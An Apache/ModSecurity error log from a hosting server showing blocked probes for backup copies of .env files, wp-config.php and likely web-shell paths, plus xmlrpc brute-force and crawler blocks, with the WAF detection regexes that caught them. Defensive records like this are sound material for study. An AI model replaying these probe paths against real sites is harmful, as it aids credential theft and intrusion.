[Tue May 26 18:54:39.522563 2026] [security2:error] [pid 1036960:tid 1037181] [client 208.84.100.18:18642] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production.old"] [unique_id "ahWfF4GNKXNii6nttH9jWQAAAOA"]
[Tue May 26 18:54:39.522633 2026] [proxy:error] [pid 1036960:tid 1037146] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.522614 2026] [security2:error] [pid 1036960:tid 1037144] [client 208.84.100.18:18690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.backup"] [unique_id "ahWfF4GNKXNii6nttH9jUQAAALs"]
[Tue May 26 18:54:39.522692 2026] [proxy_http:error] [pid 1036960:tid 1037146] [client 208.84.100.18:15022] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.523016 2026] [security2:error] [pid 1036960:tid 1037198] [client 208.84.100.18:18666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production.swp"] [unique_id "ahWfF4GNKXNii6nttH9jVwAAAPE"]
[Tue May 26 18:54:39.523064 2026] [security2:error] [pid 1036960:tid 1037157] [client 208.84.100.18:18602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local.backup"] [unique_id "ahWfF4GNKXNii6nttH9jVgAAAMg"]
[Tue May 26 18:54:39.523326 2026] [security2:error] [pid 1036960:tid 1037171] [client 208.84.100.18:18582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.copy"] [unique_id "ahWfF4GNKXNii6nttH9jWAAAANY"]
[Tue May 26 18:54:39.523447 2026] [security2:error] [pid 1036960:tid 1037216] [client 208.84.100.18:18660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production~"] [unique_id "ahWfF4GNKXNii6nttH9jUwAAAQM"]
[Tue May 26 18:54:39.523540 2026] [proxy:error] [pid 1036960:tid 1037146] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.523582 2026] [proxy_http:error] [pid 1036960:tid 1037146] [client 208.84.100.18:15022] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.523984 2026] [security2:error] [pid 1036960:tid 1037143] [client 208.84.100.18:18618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local.orig"] [unique_id "ahWfF4GNKXNii6nttH9jVQAAALo"]
[Tue May 26 18:54:39.524491 2026] [security2:error] [pid 1036960:tid 1037114] [client 208.84.100.18:18654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production.backup"] [unique_id "ahWfF4GNKXNii6nttH9jWgAAAJ0"]
[Tue May 26 18:54:39.524853 2026] [security2:error] [pid 1036960:tid 1037179] [client 208.84.100.18:18634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local.copy"] [unique_id "ahWfF4GNKXNii6nttH9jXgAAAN4"]
[Tue May 26 18:54:39.525091 2026] [security2:error] [pid 1036960:tid 1037140] [client 208.84.100.18:18588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local.bak"] [unique_id "ahWfF4GNKXNii6nttH9jXwAAALc"]
[Tue May 26 18:54:39.525163 2026] [proxy:error] [pid 1036960:tid 1037163] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.525244 2026] [proxy_http:error] [pid 1036960:tid 1037163] [client 208.84.100.18:18502] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.525898 2026] [proxy:error] [pid 1036960:tid 1037155] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.525974 2026] [proxy_http:error] [pid 1036960:tid 1037155] [client 208.84.100.18:18706] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.526104 2026] [proxy:error] [pid 1036960:tid 1037151] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.526152 2026] [proxy_http:error] [pid 1036960:tid 1037151] [client 208.84.100.18:18490] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.526151 2026] [security2:error] [pid 1036960:tid 1037213] [client 208.84.100.18:18564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env~"] [unique_id "ahWfF4GNKXNii6nttH9jYQAAAQA"]
[Tue May 26 18:54:39.526265 2026] [proxy:error] [pid 1036960:tid 1037163] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.526310 2026] [proxy_http:error] [pid 1036960:tid 1037163] [client 208.84.100.18:18502] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.526315 2026] [security2:error] [pid 1036960:tid 1037187] [client 208.84.100.18:18580] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.orig"] [unique_id "ahWfF4GNKXNii6nttH9jYgAAAOY"]
[Tue May 26 18:54:39.526466 2026] [security2:error] [pid 1036960:tid 1037167] [client 208.84.100.18:18610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local~"] [unique_id "ahWfF4GNKXNii6nttH9jXAAAANI"]
[Tue May 26 18:54:39.526587 2026] [security2:error] [pid 1036960:tid 1037214] [client 208.84.100.18:18638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production.bak"] [unique_id "ahWfF4GNKXNii6nttH9jZQAAAQE"]
[Tue May 26 18:54:39.526834 2026] [proxy:error] [pid 1036960:tid 1037155] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.526906 2026] [proxy_http:error] [pid 1036960:tid 1037155] [client 208.84.100.18:18706] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.527020 2026] [proxy:error] [pid 1036960:tid 1037151] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.527049 2026] [security2:error] [pid 1036960:tid 1037095] [client 208.84.100.18:18578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.swp"] [unique_id "ahWfF4GNKXNii6nttH9jYwAAAIo"]
[Tue May 26 18:54:39.527056 2026] [proxy_http:error] [pid 1036960:tid 1037151] [client 208.84.100.18:18490] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.527338 2026] [security2:error] [pid 1036960:tid 1037115] [client 208.84.100.18:18598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local.old"] [unique_id "ahWfF4GNKXNii6nttH9jZgAAAJ4"]
[Tue May 26 18:54:39.527934 2026] [proxy:error] [pid 1036960:tid 1037101] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.527972 2026] [proxy_http:error] [pid 1036960:tid 1037101] [client 208.84.100.18:18548] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.528162 2026] [proxy:error] [pid 1036960:tid 1037154] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.528226 2026] [proxy_http:error] [pid 1036960:tid 1037154] [client 208.84.100.18:18704] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.528546 2026] [proxy:error] [pid 1036960:tid 1037101] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.528580 2026] [proxy_http:error] [pid 1036960:tid 1037101] [client 208.84.100.18:18548] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.528784 2026] [security2:error] [pid 1036960:tid 1037109] [client 208.84.100.18:18522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.bak"] [unique_id "ahWfF4GNKXNii6nttH9jaQAAAJg"]
[Tue May 26 18:54:39.529126 2026] [proxy:error] [pid 1036960:tid 1037154] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.529199 2026] [proxy_http:error] [pid 1036960:tid 1037154] [client 208.84.100.18:18704] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.529226 2026] [security2:error] [pid 1036960:tid 1037093] [client 208.84.100.18:18536] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.old"] [unique_id "ahWfF4GNKXNii6nttH9jaAAAAIg"]
[Tue May 26 18:54:39.530711 2026] [proxy:error] [pid 1036960:tid 1037091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.530750 2026] [proxy_http:error] [pid 1036960:tid 1037091] [client 208.84.100.18:18510] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:39.531326 2026] [proxy:error] [pid 1036960:tid 1037091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:39.531359 2026] [proxy_http:error] [pid 1036960:tid 1037091] [client 208.84.100.18:18510] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:40.143814 2026] [security2:error] [pid 1036960:tid 1037105] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfF4GNKXNii6nttH9jcAAAAJQ"]
[Tue May 26 18:54:41.047702 2026] [proxy:error] [pid 1036960:tid 1037198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:41.047782 2026] [proxy_http:error] [pid 1036960:tid 1037198] [client 208.84.100.18:18598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:41.048606 2026] [proxy:error] [pid 1036960:tid 1037198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:41.048667 2026] [proxy_http:error] [pid 1036960:tid 1037198] [client 208.84.100.18:18598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:42.207591 2026] [security2:error] [pid 1036960:tid 1037060] [remote 114.119.132.173:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/current-openings.php"] [unique_id "ahWfGoGNKXNii6nttH9jqQAAqWM"], referer: https://www.stockmarketanalysis.in/sitemap.php
[Tue May 26 18:54:42.240373 2026] [security2:error] [pid 1036960:tid 1037113] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfGYGNKXNii6nttH9jogAAAJw"]
[Tue May 26 18:54:42.289892 2026] [security2:error] [pid 1036960:tid 1037111] [client 20.195.182.1:44305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWfGoGNKXNii6nttH9jqgAAAJo"]
[Tue May 26 18:54:42.290040 2026] [security2:error] [pid 1036960:tid 1037111] [client 20.195.182.1:44305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWfGoGNKXNii6nttH9jqgAAAJo"]
[Tue May 26 18:54:42.664766 2026] [security2:error] [pid 1036960:tid 1037117] [client 20.195.182.1:46303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWfGoGNKXNii6nttH9jtAAAAKA"]
[Tue May 26 18:54:42.664858 2026] [security2:error] [pid 1036960:tid 1037117] [client 20.195.182.1:46303] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWfGoGNKXNii6nttH9jtAAAAKA"]
[Tue May 26 18:54:43.035073 2026] [security2:error] [pid 1036960:tid 1037165] [client 20.195.182.1:46321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/ups.php"] [unique_id "ahWfG4GNKXNii6nttH9juwAAANA"]
[Tue May 26 18:54:43.035186 2026] [security2:error] [pid 1036960:tid 1037165] [client 20.195.182.1:46321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/ups.php"] [unique_id "ahWfG4GNKXNii6nttH9juwAAANA"]
[Tue May 26 18:54:43.396390 2026] [security2:error] [pid 1036960:tid 1037141] [client 20.195.182.1:44331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWfG4GNKXNii6nttH9jwgAAALg"]
[Tue May 26 18:54:43.396481 2026] [security2:error] [pid 1036960:tid 1037141] [client 20.195.182.1:44331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWfG4GNKXNii6nttH9jwgAAALg"]
[Tue May 26 18:54:43.765982 2026] [security2:error] [pid 1036960:tid 1037148] [client 20.195.182.1:46290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWfG4GNKXNii6nttH9j1QAAAL8"]
[Tue May 26 18:54:43.766107 2026] [security2:error] [pid 1036960:tid 1037148] [client 20.195.182.1:46290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWfG4GNKXNii6nttH9j1QAAAL8"]
[Tue May 26 18:54:44.003068 2026] [security2:error] [pid 1036960:tid 1037194] [client 79.51.36.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfG4GNKXNii6nttH9jzgAAAO0"]
[Tue May 26 18:54:44.160028 2026] [security2:error] [pid 1036960:tid 1037103] [client 20.195.182.1:46334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/wp_filemanager.php"] [unique_id "ahWfHIGNKXNii6nttH9j3wAAAJI"]
[Tue May 26 18:54:44.160143 2026] [security2:error] [pid 1036960:tid 1037103] [client 20.195.182.1:46334] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/wp_filemanager.php"] [unique_id "ahWfHIGNKXNii6nttH9j3wAAAJI"]
[Tue May 26 18:54:44.337956 2026] [security2:error] [pid 1036960:tid 1037061] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfHIGNKXNii6nttH9j5gAAo2Q"]
[Tue May 26 18:54:44.338197 2026] [security2:error] [pid 1036960:tid 1037120] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfHIGNKXNii6nttH9j5gAAo2Q"]
[Tue May 26 18:54:44.521060 2026] [security2:error] [pid 1036960:tid 1037132] [client 20.195.182.1:46308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/file18.php"] [unique_id "ahWfHIGNKXNii6nttH9j7AAAAK8"]
[Tue May 26 18:54:44.521144 2026] [security2:error] [pid 1036960:tid 1037132] [client 20.195.182.1:46308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/file18.php"] [unique_id "ahWfHIGNKXNii6nttH9j7AAAAK8"]
[Tue May 26 18:54:44.780123 2026] [security2:error] [pid 1036960:tid 1037097] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfHIGNKXNii6nttH9j6gAAAIw"]
[Tue May 26 18:54:44.891439 2026] [security2:error] [pid 1036960:tid 1037201] [client 20.195.182.1:46292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWfHIGNKXNii6nttH9j9wAAAPQ"]
[Tue May 26 18:54:44.891549 2026] [security2:error] [pid 1036960:tid 1037201] [client 20.195.182.1:46292] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWfHIGNKXNii6nttH9j9wAAAPQ"]
[Tue May 26 18:54:45.246891 2026] [security2:error] [pid 1036960:tid 1037102] [client 20.195.182.1:46295] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/wp-config.php"] [unique_id "ahWfHYGNKXNii6nttH9j_wAAAJE"]
[Tue May 26 18:54:45.246992 2026] [security2:error] [pid 1036960:tid 1037102] [client 20.195.182.1:46295] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "frsupportteam.com.md-74.webhostbox.net"] [uri "/wp-config.php"] [unique_id "ahWfHYGNKXNii6nttH9j_wAAAJE"]
[Tue May 26 18:54:47.563008 2026] [security2:error] [pid 1036960:tid 1037111] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfH4GNKXNii6nttH9kOQAAAJo"]
